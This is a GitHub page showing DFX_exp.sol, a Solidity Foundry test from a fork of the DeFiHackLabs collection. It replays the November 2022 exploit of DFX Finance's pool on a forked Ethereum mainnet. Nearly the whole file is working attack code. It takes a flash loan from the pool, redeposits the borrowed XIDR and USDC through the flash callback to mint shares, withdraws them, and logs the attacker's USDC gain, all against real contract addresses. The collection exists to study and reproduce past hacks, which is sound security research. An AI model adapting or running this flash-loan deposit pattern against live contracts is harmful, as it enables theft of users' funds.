forked from zhouxianyuan/DeFiHackLabs
-
Notifications
You must be signed in to change notification settings - Fork 2
/
DFX_exp.sol
120 lines (103 loc) · 4.14 KB
/
DFX_exp.sol
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.10;
import "forge-std/Test.sol";
import "./interface.sol";
// @Analysis
// https://twitter.com/BlockSecTeam/status/1590960299246780417
// https://twitter.com/BeosinAlert/status/1591012525914861570
// https://twitter.com/AnciliaInc/status/1590839104731684865
// https://twitter.com/peckshield/status/1590831589004816384
// TX
// https://etherscan.io/tx/0x6bfd9e286e37061ed279e4f139fbc03c8bd707a2cdd15f7260549052cbba79b7
interface Curve{
function flash(
address recipient,
uint256 amount0,
uint256 amount1,
bytes calldata data
) external;
function viewDeposit(uint256 _deposit) external view returns (uint256, uint256[] memory);
function deposit(uint256 _deposit, uint256 _deadline) external returns (uint256, uint256[] memory);
function withdraw(uint256 _curvesToBurn, uint256 _deadline) external;
}
contract ContractTest is DSTest{
IERC20 XIDR = IERC20(0xebF2096E01455108bAdCbAF86cE30b6e5A72aa52);
IERC20 USDC = IERC20(0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48);
IERC20 WETH = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2);
Uni_Router_V3 Router = Uni_Router_V3(0xE592427A0AEce92De3Edee1F18E0157C05861564);
Curve dfx =Curve(0x46161158b1947D9149E066d6d31AF1283b2d377C);
uint256 receiption;
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
function setUp() public {
cheats.createSelectFork("mainnet", 15941703);
}
function testExploit() public{
address(WETH).call{value: 2 ether}("");
WETH.approve(address(Router), type(uint).max);
USDC.approve(address(Router), type(uint).max);
USDC.approve(address(dfx), type(uint).max);
XIDR.approve(address(Router), type(uint).max);
XIDR.approve(address(dfx), type(uint).max);
WETHToUSDC();
emit log_named_decimal_uint(
"[Before] Attacker USDC balance before exploit",
USDC.balanceOf(address(this)),
6
);
USDCToXIDR();
uint[] memory XIDR_USDC = new uint[](2);
XIDR_USDC[0] = 0;
XIDR_USDC[1] = 0;
( , XIDR_USDC) = dfx.viewDeposit(200_000 * 1e18);
dfx.flash(address(this), XIDR_USDC[0] * 995 / 1000, XIDR_USDC[1] * 995 / 1000, new bytes(1)); // 5% fee
dfx.withdraw(receiption, block.timestamp + 60);
XIDRToUSDC();
emit log_named_decimal_uint(
"[End] Attacker USDC balance after exploit",
USDC.balanceOf(address(this)),
6
);
}
function flashCallback(uint256 fee0, uint256 fee1, bytes calldata data) external{
(receiption, ) = dfx.deposit(200_000 * 1e18, block.timestamp + 60);
}
function WETHToUSDC() internal{
Uni_Router_V3.ExactInputSingleParams memory _Params = Uni_Router_V3.ExactInputSingleParams({
tokenIn: address(WETH),
tokenOut: address(USDC),
fee: 500,
recipient: address(this),
deadline: block.timestamp,
amountIn: WETH.balanceOf(address(this)),
amountOutMinimum: 0,
sqrtPriceLimitX96: 0
});
Router.exactInputSingle(_Params);
}
function USDCToXIDR() internal{
Uni_Router_V3.ExactInputSingleParams memory _Params = Uni_Router_V3.ExactInputSingleParams({
tokenIn: address(USDC),
tokenOut: address(XIDR),
fee: 500,
recipient: address(this),
deadline: block.timestamp,
amountIn: USDC.balanceOf(address(this)) / 2,
amountOutMinimum: 0,
sqrtPriceLimitX96: 0
});
Router.exactInputSingle(_Params);
}
function XIDRToUSDC() internal{
Uni_Router_V3.ExactInputSingleParams memory _Params = Uni_Router_V3.ExactInputSingleParams({
tokenIn: address(XIDR),
tokenOut: address(USDC),
fee: 500,
recipient: address(this),
deadline: block.timestamp,
amountIn: XIDR.balanceOf(address(this)) / 2,
amountOutMinimum: 0,
sqrtPriceLimitX96: 0
});
Router.exactInputSingle(_Params);
}
}